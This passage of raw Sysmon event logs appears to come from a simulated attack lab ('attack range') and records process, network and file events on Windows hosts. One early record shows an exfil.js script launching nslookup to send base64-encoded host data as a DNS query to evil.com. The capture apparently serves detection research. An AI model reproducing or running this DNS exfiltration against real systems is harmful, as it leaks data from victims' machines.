System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000214471Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.015{2E1864BB-18FC-629A-E545-000000005F02}4816C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A TUFDQWRkcmVzczogMDI6RjA6NEI6MUU6QUM6Q0E= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlrentl.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000214470Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:48.003{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlnnd.tmpMD5=1672107762ECEA7286E9D317B1D4872B,SHA256=4B917B4BC62A2EA4AC7C36E28B121764EAC51D071330300C02B5F6C0A7A1F19F,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000214469Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.752{00000000-0000-0000-0000-000000000000}7080<unknown process>-udptruefalse127.0.0.1-51175-false127.0.0.1-53domain 354300x8000000000000000214468Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.658{00000000-0000-0000-0000-000000000000}7232<unknown process>-udpfalsefalse127.0.0.1-51173-false127.0.0.1-53domain 354300x8000000000000000214467Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.337{00000000-0000-0000-0000-000000000000}4552<unknown process>-udpfalsefalse127.0.0.1-51167-false127.0.0.1-53domain 354300x8000000000000000214466Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.185{00000000-0000-0000-0000-000000000000}4040<unknown process>-udpfalsefalse127.0.0.1-51159-false127.0.0.1-53domain 354300x8000000000000000214465Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.094{00000000-0000-0000-0000-000000000000}6160<unknown process>-udpfalsefalse127.0.0.1-51156-false127.0.0.1-53domain 354300x8000000000000000214464Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:45.094{00000000-0000-0000-0000-000000000000}6160<unknown process>-udptruefalse127.0.0.1-51156-false127.0.0.1-53domain 354300x8000000000000000214463Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.995{00000000-0000-0000-0000-000000000000}6984<unknown process>-udpfalsefalse127.0.0.1-51155-false127.0.0.1-53domain 354300x8000000000000000214462Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.995{00000000-0000-0000-0000-000000000000}6984<unknown process>-udptruefalse127.0.0.1-51155-false127.0.0.1-53domain 354300x8000000000000000214461Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.994{00000000-0000-0000-0000-000000000000}6984<unknown process>-udpfalsefalse127.0.0.1-51154-false127.0.0.1-53domain 354300x8000000000000000214460Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.994{00000000-0000-0000-0000-000000000000}6984<unknown process>-udptruefalse127.0.0.1-51154-false127.0.0.1-53domain 354300x8000000000000000214459Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.993{00000000-0000-0000-0000-000000000000}6984<unknown process>-udpfalsefalse127.0.0.1-51153-false127.0.0.1-53domain 354300x8000000000000000214458Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:44.993{00000000-0000-0000-0000-000000000000}6984<unknown process>-udptruefalse127.0.0.1-51153-false127.0.0.1-53domain 10341000x800000000000000044861Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:21:48.987{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044860Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:21:48.987{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044859Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:21:48.987{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044858Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:21:48.987{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044857Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:21:48.987{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044856Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:21:48.987{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044855Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:21:48.987{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044854Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:21:48.987{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044853Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:21:48.987{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044852Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:21:48.987{0A5DF930-E35B-6299-0500-000000006002}412428C:\Windows\system32\csrss.exe{0A5DF930-18FC-629A-3207-000000006002}1952C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000044851Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:21:48.987{0A5DF930-E3BE-6299-9D00-000000006002}20843480C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0A5DF930-18FC-629A-3207-000000006002}1952C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000044850Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:21:48.990{0A5DF930-18FC-629A-3207-000000006002}1952C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0A5DF930-E35B-6299-E703-000000000000}0x3e70SystemMD5=679D3E04F6AB7B10FF27D06B29C27A12,SHA256=FF1B5220C99EA6173BE693E1C2D700873ADE2F8A73F503FC0D297EA0792756D1,IMPHASH=05D58741E22C6453F52C1A9326FAF02D{0A5DF930-E3BE-6299-9D00-000000006002}2084C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000044849Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:21:48.987{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=54054D2D628CF1B9BB30E0E5A0D5F48B,SHA256=E938913E3D0BE667495D076E383E89B85B77253FB8CD5A5E08BE2CD07F7784BF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044848Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:21:48.987{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=6EC9D68ECA06C75DA9A83954545EB388,SHA256=C41E46B275F03D7DD8D3E0F2D2516BC066023182667ACF125C1DD8A896FFC7AC,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000044847Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:21:48.550{0A5DF930-18FC-629A-3107-000000006002}39643128C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{0A5DF930-E3BE-6299-9D00-000000006002}2084C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6ae795|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6ae2c6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+643d8|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+65dfc|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+9dcf50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044846Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:21:48.393{0A5DF930-E3BF-6299-A100-000000006002}31841748C:\Windows\system32\conhost.exe{0A5DF930-18FC-629A-3107-000000006002}3964C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044845Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:21:48.393{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044844Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:21:48.393{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044843Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:21:48.393{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044842Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:21:48.393{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044841Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:21:48.393{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044840Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:21:48.393{0A5DF930-E35B-6299-0C00-000000006002}7241764C:\Windows\system32\svchost.exe{0A5DF930-E35C-6299-1F00-000000006002}2024C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000044839Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 